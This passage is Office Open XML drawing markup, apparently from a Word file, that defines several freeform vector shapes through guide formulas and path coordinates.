                              <a:gd name="T16" fmla="*/ 0 w 74"/>
                              <a:gd name="T17" fmla="*/ 428 h 526"/>
                              <a:gd name="T18" fmla="*/ 24 w 74"/>
                              <a:gd name="T19" fmla="*/ 312 h 526"/>
                              <a:gd name="T20" fmla="*/ 41 w 74"/>
                              <a:gd name="T21" fmla="*/ 214 h 526"/>
                              <a:gd name="T22" fmla="*/ 33 w 74"/>
                              <a:gd name="T23" fmla="*/ 117 h 526"/>
                              <a:gd name="T24" fmla="*/ 8 w 74"/>
                              <a:gd name="T25" fmla="*/ 39 h 526"/>
                              <a:gd name="T26" fmla="*/ 8 w 74"/>
                              <a:gd name="T27" fmla="*/ 0 h 526"/>
                              <a:gd name="T28" fmla="*/ 16 w 74"/>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26">
                                <a:moveTo>
                                  <a:pt x="16" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="57" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16"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794084867" name="Freeform 27"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6938" y="4342"/>
                            <a:ext cx="36" cy="35"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 206 w 214"/>
                              <a:gd name="T1" fmla="*/ 136 h 214"/>
                              <a:gd name="T2" fmla="*/ 165 w 214"/>
                              <a:gd name="T3" fmla="*/ 194 h 214"/>
                              <a:gd name="T4" fmla="*/ 115 w 214"/>
                              <a:gd name="T5" fmla="*/ 214 h 214"/>
                              <a:gd name="T6" fmla="*/ 66 w 214"/>
                              <a:gd name="T7" fmla="*/ 214 h 214"/>
                              <a:gd name="T8" fmla="*/ 16 w 214"/>
                              <a:gd name="T9" fmla="*/ 175 h 214"/>
                              <a:gd name="T10" fmla="*/ 0 w 214"/>
                              <a:gd name="T11" fmla="*/ 156 h 214"/>
                              <a:gd name="T12" fmla="*/ 0 w 214"/>
                              <a:gd name="T13" fmla="*/ 136 h 214"/>
                              <a:gd name="T14" fmla="*/ 8 w 214"/>
                              <a:gd name="T15" fmla="*/ 136 h 214"/>
                              <a:gd name="T16" fmla="*/ 33 w 214"/>
                              <a:gd name="T17" fmla="*/ 136 h 214"/>
                              <a:gd name="T18" fmla="*/ 107 w 214"/>
                              <a:gd name="T19" fmla="*/ 117 h 214"/>
                              <a:gd name="T20" fmla="*/ 140 w 214"/>
                              <a:gd name="T21" fmla="*/ 78 h 214"/>
                              <a:gd name="T22" fmla="*/ 173 w 214"/>
                              <a:gd name="T23" fmla="*/ 19 h 214"/>
                              <a:gd name="T24" fmla="*/ 189 w 214"/>
                              <a:gd name="T25" fmla="*/ 0 h 214"/>
                              <a:gd name="T26" fmla="*/ 206 w 214"/>
                              <a:gd name="T27" fmla="*/ 39 h 214"/>
                              <a:gd name="T28" fmla="*/ 214 w 214"/>
                              <a:gd name="T29" fmla="*/ 78 h 214"/>
                              <a:gd name="T30" fmla="*/ 20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136"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="165" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20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86908612" name="Freeform 28"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6974" y="4189"/>
                            <a:ext cx="29" cy="16"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 156 w 173"/>
                              <a:gd name="T1" fmla="*/ 20 h 98"/>
                              <a:gd name="T2" fmla="*/ 124 w 173"/>
                              <a:gd name="T3" fmla="*/ 20 h 98"/>
                              <a:gd name="T4" fmla="*/ 91 w 173"/>
                              <a:gd name="T5" fmla="*/ 78 h 98"/>
                              <a:gd name="T6" fmla="*/ 74 w 173"/>
                              <a:gd name="T7" fmla="*/ 98 h 98"/>
                              <a:gd name="T8" fmla="*/ 58 w 173"/>
                              <a:gd name="T9" fmla="*/ 78 h 98"/>
                              <a:gd name="T10" fmla="*/ 0 w 173"/>
                              <a:gd name="T11" fmla="*/ 20 h 98"/>
                              <a:gd name="T12" fmla="*/ 0 w 173"/>
                              <a:gd name="T13" fmla="*/ 0 h 98"/>
                              <a:gd name="T14" fmla="*/ 8 w 173"/>
                              <a:gd name="T15" fmla="*/ 0 h 98"/>
                              <a:gd name="T16" fmla="*/ 66 w 173"/>
                              <a:gd name="T17" fmla="*/ 20 h 98"/>
                              <a:gd name="T18" fmla="*/ 82 w 173"/>
                              <a:gd name="T19" fmla="*/ 20 h 98"/>
                              <a:gd name="T20" fmla="*/ 115 w 173"/>
                              <a:gd name="T21" fmla="*/ 0 h 98"/>
                              <a:gd name="T22" fmla="*/ 156 w 173"/>
                              <a:gd name="T23" fmla="*/ 0 h 98"/>
                              <a:gd name="T24" fmla="*/ 165 w 173"/>
                              <a:gd name="T25" fmla="*/ 20 h 98"/>
                              <a:gd name="T26" fmla="*/ 173 w 173"/>
                              <a:gd name="T27" fmla="*/ 39 h 98"/>
                              <a:gd name="T28" fmla="*/ 156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20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="124" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156"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13481935" name="Freeform 29"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6957" y="4082"/>
                            <a:ext cx="44" cy="107"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 264 w 264"/>
                              <a:gd name="T1" fmla="*/ 623 h 642"/>
                              <a:gd name="T2" fmla="*/ 255 w 264"/>
                              <a:gd name="T3" fmla="*/ 603 h 642"/>
                              <a:gd name="T4" fmla="*/ 223 w 264"/>
                              <a:gd name="T5" fmla="*/ 526 h 642"/>
                              <a:gd name="T6" fmla="*/ 140 w 264"/>
                              <a:gd name="T7" fmla="*/ 331 h 642"/>
                              <a:gd name="T8" fmla="*/ 50 w 264"/>
                              <a:gd name="T9" fmla="*/ 117 h 642"/>
                              <a:gd name="T10" fmla="*/ 17 w 264"/>
                              <a:gd name="T11" fmla="*/ 39 h 642"/>
                              <a:gd name="T12" fmla="*/ 0 w 264"/>
                              <a:gd name="T13" fmla="*/ 0 h 642"/>
                              <a:gd name="T14" fmla="*/ 0 w 264"/>
                              <a:gd name="T15" fmla="*/ 20 h 642"/>
                              <a:gd name="T16" fmla="*/ 0 w 264"/>
                              <a:gd name="T17" fmla="*/ 78 h 642"/>
                              <a:gd name="T18" fmla="*/ 17 w 264"/>
                              <a:gd name="T19" fmla="*/ 234 h 642"/>
                              <a:gd name="T20" fmla="*/ 17 w 264"/>
                              <a:gd name="T21" fmla="*/ 312 h 642"/>
                              <a:gd name="T22" fmla="*/ 9 w 264"/>
                              <a:gd name="T23" fmla="*/ 389 h 642"/>
                              <a:gd name="T24" fmla="*/ 9 w 264"/>
                              <a:gd name="T25" fmla="*/ 409 h 642"/>
                              <a:gd name="T26" fmla="*/ 17 w 264"/>
                              <a:gd name="T27" fmla="*/ 409 h 642"/>
                              <a:gd name="T28" fmla="*/ 66 w 264"/>
                              <a:gd name="T29" fmla="*/ 409 h 642"/>
                              <a:gd name="T30" fmla="*/ 132 w 264"/>
                              <a:gd name="T31" fmla="*/ 467 h 642"/>
                              <a:gd name="T32" fmla="*/ 198 w 264"/>
                              <a:gd name="T33" fmla="*/ 545 h 642"/>
                              <a:gd name="T34" fmla="*/ 239 w 264"/>
                              <a:gd name="T35" fmla="*/ 623 h 642"/>
                              <a:gd name="T36" fmla="*/ 264 w 264"/>
                              <a:gd name="T37" fmla="*/ 642 h 642"/>
                              <a:gd name="T38" fmla="*/ 264 w 264"/>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623"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="255" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="198" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="264" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="264"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100048376" name="Freeform 30"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6953" y="4062"/>
                            <a:ext cx="7" cy="78"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 25 w 41"/>
                              <a:gd name="T1" fmla="*/ 20 h 467"/>
                              <a:gd name="T2" fmla="*/ 41 w 41"/>
                              <a:gd name="T3" fmla="*/ 117 h 467"/>
                              <a:gd name="T4" fmla="*/ 41 w 41"/>
                              <a:gd name="T5" fmla="*/ 156 h 467"/>
                              <a:gd name="T6" fmla="*/ 33 w 41"/>
                              <a:gd name="T7" fmla="*/ 195 h 467"/>
                              <a:gd name="T8" fmla="*/ 25 w 41"/>
                              <a:gd name="T9" fmla="*/ 273 h 467"/>
                              <a:gd name="T10" fmla="*/ 33 w 41"/>
                              <a:gd name="T11" fmla="*/ 409 h 467"/>
                              <a:gd name="T12" fmla="*/ 33 w 41"/>
                              <a:gd name="T13" fmla="*/ 448 h 467"/>
                              <a:gd name="T14" fmla="*/ 33 w 41"/>
                              <a:gd name="T15" fmla="*/ 467 h 467"/>
                              <a:gd name="T16" fmla="*/ 25 w 41"/>
                              <a:gd name="T17" fmla="*/ 467 h 467"/>
                              <a:gd name="T18" fmla="*/ 17 w 41"/>
                              <a:gd name="T19" fmla="*/ 448 h 467"/>
                              <a:gd name="T20" fmla="*/ 0 w 41"/>
                              <a:gd name="T21" fmla="*/ 351 h 467"/>
                              <a:gd name="T22" fmla="*/ 0 w 41"/>
                              <a:gd name="T23" fmla="*/ 234 h 467"/>
                              <a:gd name="T24" fmla="*/ 0 w 41"/>
                              <a:gd name="T25" fmla="*/ 117 h 467"/>
                              <a:gd name="T26" fmla="*/ 17 w 41"/>
                              <a:gd name="T27" fmla="*/ 0 h 467"/>
                              <a:gd name="T28" fmla="*/ 25 w 41"/>
                              <a:gd name="T29" fmla="*/ 0 h 467"/>
                              <a:gd name="T30" fmla="*/ 25 w 41"/>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67">
                                <a:moveTo>
                                  <a:pt x="25" y="20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="41" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25"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078630129" name="Freeform 31"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6893" y="4208"/>
                            <a:ext cx="40" cy="36"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 238"/>
                              <a:gd name="T1" fmla="*/ 20 h 214"/>
                              <a:gd name="T2" fmla="*/ 49 w 238"/>
                              <a:gd name="T3" fmla="*/ 117 h 214"/>
                              <a:gd name="T4" fmla="*/ 115 w 238"/>
                              <a:gd name="T5" fmla="*/ 195 h 214"/>
                              <a:gd name="T6" fmla="*/ 181 w 238"/>
                              <a:gd name="T7" fmla="*/ 214 h 214"/>
                              <a:gd name="T8" fmla="*/ 206 w 238"/>
                              <a:gd name="T9" fmla="*/ 195 h 214"/>
                              <a:gd name="T10" fmla="*/ 230 w 238"/>
                              <a:gd name="T11" fmla="*/ 156 h 214"/>
                              <a:gd name="T12" fmla="*/ 238 w 238"/>
                              <a:gd name="T13" fmla="*/ 117 h 214"/>
                              <a:gd name="T14" fmla="*/ 230 w 238"/>
                              <a:gd name="T15" fmla="*/ 78 h 214"/>
                              <a:gd name="T16" fmla="*/ 222 w 238"/>
                              <a:gd name="T17" fmla="*/ 78 h 214"/>
                              <a:gd name="T18" fmla="*/ 214 w 238"/>
                              <a:gd name="T19" fmla="*/ 78 h 214"/>
                              <a:gd name="T20" fmla="*/ 164 w 238"/>
                              <a:gd name="T21" fmla="*/ 117 h 214"/>
                              <a:gd name="T22" fmla="*/ 107 w 238"/>
                              <a:gd name="T23" fmla="*/ 117 h 214"/>
                              <a:gd name="T24" fmla="*/ 49 w 238"/>
                              <a:gd name="T25" fmla="*/ 78 h 214"/>
                              <a:gd name="T26" fmla="*/ 8 w 238"/>
                              <a:gd name="T27" fmla="*/ 20 h 214"/>
                              <a:gd name="T28" fmla="*/ 0 w 238"/>
                              <a:gd name="T29" fmla="*/ 0 h 214"/>
                              <a:gd name="T30" fmla="*/ 0 w 238"/>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214">
                                <a:moveTo>
                                  <a:pt x="0" y="20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="49" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8"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769756120" name="Freeform 32"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6883" y="4117"/>
                            <a:ext cx="14" cy="75"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8 w 82"/>
                              <a:gd name="T1" fmla="*/ 448 h 448"/>
                              <a:gd name="T2" fmla="*/ 24 w 82"/>
                              <a:gd name="T3" fmla="*/ 448 h 448"/>
                              <a:gd name="T4" fmla="*/ 57 w 82"/>
                              <a:gd name="T5" fmla="*/ 409 h 448"/>
                              <a:gd name="T6" fmla="*/ 74 w 82"/>
                              <a:gd name="T7" fmla="*/ 331 h 448"/>
                              <a:gd name="T8" fmla="*/ 82 w 82"/>
                              <a:gd name="T9" fmla="*/ 253 h 448"/>
                              <a:gd name="T10" fmla="*/ 74 w 82"/>
                              <a:gd name="T11" fmla="*/ 156 h 448"/>
                              <a:gd name="T12" fmla="*/ 41 w 82"/>
                              <a:gd name="T13" fmla="*/ 39 h 448"/>
                              <a:gd name="T14" fmla="*/ 24 w 82"/>
                              <a:gd name="T15" fmla="*/ 0 h 448"/>
                              <a:gd name="T16" fmla="*/ 16 w 82"/>
                              <a:gd name="T17" fmla="*/ 0 h 448"/>
                              <a:gd name="T18" fmla="*/ 16 w 82"/>
                              <a:gd name="T19" fmla="*/ 20 h 448"/>
                              <a:gd name="T20" fmla="*/ 24 w 82"/>
                              <a:gd name="T21" fmla="*/ 78 h 448"/>
                              <a:gd name="T22" fmla="*/ 33 w 82"/>
                              <a:gd name="T23" fmla="*/ 136 h 448"/>
                              <a:gd name="T24" fmla="*/ 33 w 82"/>
                              <a:gd name="T25" fmla="*/ 195 h 448"/>
                              <a:gd name="T26" fmla="*/ 16 w 82"/>
                              <a:gd name="T27" fmla="*/ 312 h 448"/>
                              <a:gd name="T28" fmla="*/ 0 w 82"/>
                              <a:gd name="T29" fmla="*/ 389 h 448"/>
                              <a:gd name="T30" fmla="*/ 8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 y="448"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="24" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8"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065184555" name="Freeform 33"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5631" y="6125"/>
                            <a:ext cx="47" cy="110"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 165 w 280"/>
                              <a:gd name="T1" fmla="*/ 58 h 661"/>
                              <a:gd name="T2" fmla="*/ 197 w 280"/>
                              <a:gd name="T3" fmla="*/ 39 h 661"/>
                              <a:gd name="T4" fmla="*/ 230 w 280"/>
                              <a:gd name="T5" fmla="*/ 39 h 661"/>
                              <a:gd name="T6" fmla="*/ 230 w 280"/>
                              <a:gd name="T7" fmla="*/ 97 h 661"/>
                              <a:gd name="T8" fmla="*/ 222 w 280"/>
                              <a:gd name="T9" fmla="*/ 214 h 661"/>
                              <a:gd name="T10" fmla="*/ 230 w 280"/>
                              <a:gd name="T11" fmla="*/ 389 h 661"/>
                              <a:gd name="T12" fmla="*/ 247 w 280"/>
                              <a:gd name="T13" fmla="*/ 506 h 661"/>
                              <a:gd name="T14" fmla="*/ 272 w 280"/>
                              <a:gd name="T15" fmla="*/ 623 h 661"/>
                              <a:gd name="T16" fmla="*/ 280 w 280"/>
                              <a:gd name="T17" fmla="*/ 661 h 661"/>
                              <a:gd name="T18" fmla="*/ 272 w 280"/>
                              <a:gd name="T19" fmla="*/ 661 h 661"/>
                              <a:gd name="T20" fmla="*/ 255 w 280"/>
                              <a:gd name="T21" fmla="*/ 623 h 661"/>
                              <a:gd name="T22" fmla="*/ 222 w 280"/>
                              <a:gd name="T23" fmla="*/ 545 h 661"/>
                              <a:gd name="T24" fmla="*/ 140 w 280"/>
                              <a:gd name="T25" fmla="*/ 350 h 661"/>
                              <a:gd name="T26" fmla="*/ 49 w 280"/>
                              <a:gd name="T27" fmla="*/ 136 h 661"/>
                              <a:gd name="T28" fmla="*/ 16 w 280"/>
                              <a:gd name="T29" fmla="*/ 58 h 661"/>
                              <a:gd name="T30" fmla="*/ 8 w 280"/>
                              <a:gd name="T31" fmla="*/ 19 h 661"/>
                              <a:gd name="T32" fmla="*/ 0 w 280"/>
                              <a:gd name="T33" fmla="*/ 0 h 661"/>
                              <a:gd name="T34" fmla="*/ 16 w 280"/>
                              <a:gd name="T35" fmla="*/ 0 h 661"/>
                              <a:gd name="T36" fmla="*/ 58 w 280"/>
                              <a:gd name="T37" fmla="*/ 19 h 661"/>
                              <a:gd name="T38" fmla="*/ 99 w 280"/>
                              <a:gd name="T39" fmla="*/ 39 h 661"/>
                              <a:gd name="T40" fmla="*/ 132 w 280"/>
                              <a:gd name="T41" fmla="*/ 78 h 661"/>
                              <a:gd name="T42" fmla="*/ 148 w 280"/>
                              <a:gd name="T43" fmla="*/ 78 h 661"/>
                              <a:gd name="T44" fmla="*/ 165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65" y="58"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="197" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165"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684401777" name="Freeform 34"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5609" y="6164"/>
                            <a:ext cx="14" cy="84"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 58 w 82"/>
                              <a:gd name="T1" fmla="*/ 506 h 506"/>
                              <a:gd name="T2" fmla="*/ 17 w 82"/>
                              <a:gd name="T3" fmla="*/ 370 h 506"/>
                              <a:gd name="T4" fmla="*/ 0 w 82"/>
                              <a:gd name="T5" fmla="*/ 234 h 506"/>
                              <a:gd name="T6" fmla="*/ 8 w 82"/>
                              <a:gd name="T7" fmla="*/ 98 h 506"/>
                              <a:gd name="T8" fmla="*/ 25 w 82"/>
                              <a:gd name="T9" fmla="*/ 0 h 506"/>
                              <a:gd name="T10" fmla="*/ 49 w 82"/>
                              <a:gd name="T11" fmla="*/ 0 h 506"/>
                              <a:gd name="T12" fmla="*/ 66 w 82"/>
                              <a:gd name="T13" fmla="*/ 20 h 506"/>
                              <a:gd name="T14" fmla="*/ 82 w 82"/>
                              <a:gd name="T15" fmla="*/ 59 h 506"/>
                              <a:gd name="T16" fmla="*/ 74 w 82"/>
                              <a:gd name="T17" fmla="*/ 98 h 506"/>
                              <a:gd name="T18" fmla="*/ 49 w 82"/>
                              <a:gd name="T19" fmla="*/ 195 h 506"/>
                              <a:gd name="T20" fmla="*/ 41 w 82"/>
                              <a:gd name="T21" fmla="*/ 312 h 506"/>
                              <a:gd name="T22" fmla="*/ 49 w 82"/>
                              <a:gd name="T23" fmla="*/ 409 h 506"/>
                              <a:gd name="T24" fmla="*/ 66 w 82"/>
                              <a:gd name="T25" fmla="*/ 487 h 506"/>
                              <a:gd name="T26" fmla="*/ 66 w 82"/>
                              <a:gd name="T27" fmla="*/ 506 h 506"/>
                              <a:gd name="T28" fmla="*/ 58 w 82"/>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6">
                                <a:moveTo>
                                  <a:pt x="58" y="506"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="17" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="0"/>
